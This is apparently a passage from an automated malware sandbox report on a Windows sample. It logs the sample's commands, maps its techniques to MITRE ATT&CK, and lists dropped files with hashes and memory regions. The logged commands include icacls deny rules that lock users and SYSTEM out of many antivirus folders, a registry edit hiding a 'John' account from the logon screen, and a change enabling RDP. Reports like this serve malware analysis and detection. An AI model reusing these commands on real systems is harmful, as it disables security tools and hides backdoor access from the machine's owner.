C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AV_block_remover" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Desktop\AutoLogger" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Desktop\AutoLogger" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\Downloads\AutoLogger" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Users\Admin\Downloads\AutoLogger" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f4⤵
-
C:\Windows\system32\reg.exereg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v John /t REG_DWORD /d 0 /f5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Kaspersky Lab" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Bitdefender Agent" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\DrWeb" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\Doctor Web" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\AV" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Doctor Web" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Doctor Web" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\grizzly" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\grizzly" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Cezurity" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Cezurity" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Cezurity" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Cezurity" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\McAfee" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\McAfee" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\McAfee" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Common Files\McAfee" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Rainmeter" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Rainmeter" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Loaris Trojan Remover" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\Loaris Trojan Remover" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Avira" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Avira" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\GRIZZLY Antivirus" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\ESET" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Lasso" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Ravantivirus" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Evernote" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\WavePad" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\RobotDemo" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\PuzzleMedia" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\ESET" /deny system:(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\FingerPrint" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\BookManager" /deny system:(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Panda Security" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Panda Security" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\IObit\Advanced SystemCare" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\IObit\IObit Malware Fighter" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files (x86)\Transmission" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files (x86)\Transmission" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\Program Files\Transmission" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\Program Files\Transmission" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Process Hacker 2" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\Process Hacker 2" /deny "Admin":(OI)(CI)(F)5⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\princeton-produce" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\princeton-produce" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\EnigmaSoft" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files\EnigmaSoft" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\SUPERAntiSpyware" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "c:\program files\SUPERAntiSpyware" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\PROGRAM FILES\RogueKiller" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\PROGRAM FILES\RogueKiller" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Moo0" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\Moo0" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpeedFan" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\SpeedFan" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\GPU Temp" /deny "%username%":(OI)(CI)(F)4⤵
-
C:\Windows\system32\icacls.exeicacls "C:\Program Files (x86)\GPU Temp" /deny "Admin":(OI)(CI)(F)5⤵
- Modifies file permissions
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
3Windows Service
3Account Manipulation
1Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
3Windows Service
3Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
2Winlogon Helper DLL
1Scheduled Task/Job
1Defense Evasion
Modify Registry
5Impair Defenses
3Disable or Modify Tools
2Disable or Modify System Firewall
1Virtualization/Sandbox Evasion
1File and Directory Permissions Modification
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\RDPWinst.exeFilesize
1.4MB
MD53288c284561055044c489567fd630ac2
SHA111ffeabbe42159e1365aa82463d8690c845ce7b7
SHA256ac92d4c6397eb4451095949ac485ef4ec38501d7bb6f475419529ae67e297753
SHA512c25b28a340a23a9fa932aa95075f85fdd61880f29ef96f5179097b652f69434e0f1f8825e2648b2a0de1f4b0f9b8373080a22117974fcdf44112906d330fca02
-
C:\ProgramData\Setup\Game.exeFilesize
48.6MB
MD5bbc538b2f534ed5db2526642a3fffd5c
SHA1b937d5f4371325aa00a4227fe2401a4fcc0cbed3
SHA256f4ee9dc6c556cee21155d75d27286b69518c48131477884fc8436ab62a27b3f1
SHA512b19793f3d835b6c112a4151bfab7a2ed8710571f6085f7a5d1b2841b2e9276f11cc6e36f5cf1c04da45ec5a69ebb825b02cd794e081e33e08367db83790c421a
-
C:\ProgramData\Setup\IP.exeFilesize
19.0MB
MD538d010af4e4cd666b95160fb760d7e0f
SHA1503b0fec4b31bd568e4bcd7b837fc8b93e801187
SHA25602a6b10aacb0a004f2dcddcc8590ec8fb4ef657b2c9f19c077808e768c7a93e2
SHA512b3823cda915e6212aa13b41ad54fa0f80bfab36c23de32dd8a01b37ffa845bd4fe452c46c568db953526634667ccc1d171789f32d2b05762c8a5ccdb6e82b3ae
-
C:\ProgramData\Setup\KMS.exeFilesize
6.4MB
MD520b93df357f8e898864e910fd91a5c93
SHA18112b38167733f753bc7eb8c0b74a296b4af2873
SHA256c32990ee2fcb050ffc23982e7be81c77ad76dbe2170df47415f51eb7116f2c40
SHA5125f5afa9b5e79ef49af4030259227d70a7ff9146ec334c1e1590396c5e8e58321420945c0575b7bfcd2d54de118fcf8ff9bffbf90298b590c5647b3291eeb198d
-
C:\ProgramData\Setup\smss.exeFilesize
9.4MB
MD56fde344165a369c3586a68317279247c
SHA1e39b5038f44757a7049c4ebabbd6f62deb280796
SHA25690f414ca8e7fe410a19ea1be7895f8b7df55b35d4289f1bd7c8900b2c886f4b4
SHA512880650d5db061a4aab3df0c99ed1871de4347fb6ed7305c596fa4b75ec57e9c7acecebeeef675ba864d727a898963fe397af08a5d71e7993289299764931349a
-
C:\ProgramData\Windows Tasks Service\settings.datFilesize
2KB
MD5bc909d39981af556d07dc67178f61472
SHA1a4e5b1c5bc746435a5baf11b728e83fb8e654da0
SHA25610cf28ab39bf7ba76b91b043a007006d13d4a661fbcaad3d7820c19407b1e6a8
SHA512acf34884a865cdabfbb9a49b948ccc74fe1e158636b23e2f728c2df6fd2fb7bda0929eeddf4bf58d90b034215dafa5e2c697050c51c2f2259ff77fa02d80f51a
-
C:\ProgramData\Windows Tasks Service\winserv.exeFilesize
10.2MB
MD53f4f5a6cb95047fea6102bd7d2226aa9
SHA1fc09dd898b6e7ff546e4a7517a715928fbafc297
SHA25699fd9e75e6241eff30e01c5b59df9e901fb24d12bee89c069cc6158f78b3cc98
SHA512de5c8155f426a4e55953ae85410c7d9ad84f5643c30865fc036d1270310e28754772bd0f3093444a16ef0c1fa3db6c56301746fb5e7f03ce692bfdad0c4fb688
-
C:\Programdata\Install\del.batFilesize
315B
MD5155557517f00f2afc5400ba9dc25308e
SHA177a53a8ae146cf1ade1c9d55bbd862cbeb6db940
SHA256f00d027b0ed99814846378065b3da90d72d76307d37b7be46f5a480f425a764e
SHA51240baee6e6b22c386886d89172ad7c17605166f992f2d364c68d90b9874ab6f7b85e0accc91e83b4fbd2ae702def365f23542f22f6be7ff2f7949496cc0ba8a32
-
C:\Programdata\Microsoft\temp\H.batFilesize
3KB
MD5dc9fa52171eb0944c00164c6a046cb58
SHA1b55cbc8422b4cc006fe47675b7d1b67cc02657e8
SHA256c46aadd00d3a7b81a3910703cd109b86ec1d52cc08493a9d3ac757ec55046010
SHA51282009d261a17c34f4652d1d383fff12ce0761fe8d7483cee20183c983bc01e947d1d2af97642476b23eb48485121adddfe9ad3319ceec3f0726826885a0de7fd
-
C:\Users\Admin\AppData\Local\Temp\aut7849.tmpFilesize
28.1MB
MD54b45a3dffdf9e550cb4cdf632fd56d15
SHA151c6605ea871ea0668a0db8264c2d52d459fdf6d
SHA256ebff3f4a6eb0b94d5b417480f00baa6ba080c5a1b2ae2b8744ee88f8eea64d6c
SHA51213b2c30e7ad4f035e8b41d3c8f89e797261f87cab5b95b94c7d384a861b6353b76eac23a26549bc41a9c1460de39f2ae0f7ad4beeee6a3f96688f4050b5c9c17
-
C:\Windows\SysWOW64\unsecapp.exeFilesize
13.0MB
MD5f41ac8c7f6f7871848ddb6fb718a15bb
SHA1bce00d05c76d0a4eedbd76c2e87fc55c644edac0
SHA256d30a26d6f6676d700f86db8ff522cccfea285e1272f2dba210cf99c3b676a773
SHA51262316becb846b12396401fdb79c14ada97495abdd241fe4815c963d6ea315989bc6f283ff68c17cd90e5b62d3ea025770f4883b2b1f387d0dbe2d41a1c541ba6
-
\??\PIPE\wkssvcMD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
\??\c:\program files\rdp wrapper\rdpwrap.dllFilesize
114KB
MD5461ade40b800ae80a40985594e1ac236
SHA1b3892eef846c044a2b0785d54a432b3e93a968c8
SHA256798af20db39280f90a1d35f2ac2c1d62124d1f5218a2a0fa29d87a13340bd3e4
SHA512421f9060c4b61fa6f4074508602a2639209032fd5df5bfc702a159e3bad5479684ccb3f6e02f3e38fb8db53839cf3f41fe58a3acad6ec1199a48dc333b2d8a26
-
\??\c:\program files\rdp wrapper\rdpwrap.iniFilesize
419KB
MD58b9a639a7df4a8ce006f69338c5ca250
SHA1287064977c7f73299bcc7401a9a680a7a92c017f
SHA256d1616d5dec7947c7d113e4b49229f3a2edcd13234299cf0fb3c132100bee9a66
SHA512383f34920e9296764a00233263a75667675540ddcf900ec29661d3c467b4ab784dedac51bfa39291bc7489364ed3bccabeae865170e4f4294e4e4afcb253ebd5
-
memory/1272-42-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmpFilesize
15.8MB
-
memory/1272-40-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmpFilesize
15.8MB
-
memory/1272-38-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmpFilesize
15.8MB
-
memory/1272-44-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmpFilesize
15.8MB
-
memory/1272-43-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmpFilesize
15.8MB
-
memory/1272-41-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmpFilesize
15.8MB
-
memory/1272-49-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmpFilesize
15.8MB
-
memory/1272-39-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmpFilesize
15.8MB
-
memory/1272-37-0x00007FF6E5710000-0x00007FF6E66DA000-memory.dmpFilesize
15.8MB
-
memory/1320-160-0x0000000000400000-0x0000000000E31000-memory.dmpFilesize
10.2MB
-
memory/1372-490-0x0000000000400000-0x000000000056F000-memory.dmpFilesize
1.4MB
-
memory/1636-155-0x0000000000400000-0x0000000000E31000-memory.dmpFilesize
10.2MB
-
memory/1804-4-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-6-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-1-0x00007FFB7E1A7000-0x00007FFB7E1A9000-memory.dmpFilesize
8KB
-
memory/1804-59-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-3-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-61-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-5-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-175-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-7-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-85-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-0-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-8-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-97-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-50-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-48-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-9-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1804-2-0x00007FF68BE40000-0x00007FF68C94F000-memory.dmpFilesize
11.1MB
-
memory/1944-384-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmpFilesize
22.0MB
-
memory/1944-377-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmpFilesize
22.0MB
-
memory/1944-386-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmpFilesize
22.0MB
-
memory/1944-387-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmpFilesize
22.0MB
-
memory/1944-385-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmpFilesize
22.0MB
-
memory/1944-383-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmpFilesize
22.0MB
-
memory/1944-382-0x00007FF6AF770000-0x00007FF6B0D6E000-memory.dmpFilesize
22.0MB
-
memory/2304-145-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmpFilesize
26.4MB
-
memory/2304-325-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmpFilesize
26.4MB
-
memory/2304-144-0x00007FF62E280000-0x00007FF62FCE3000-memory.dmpFilesize
26.4MB
-
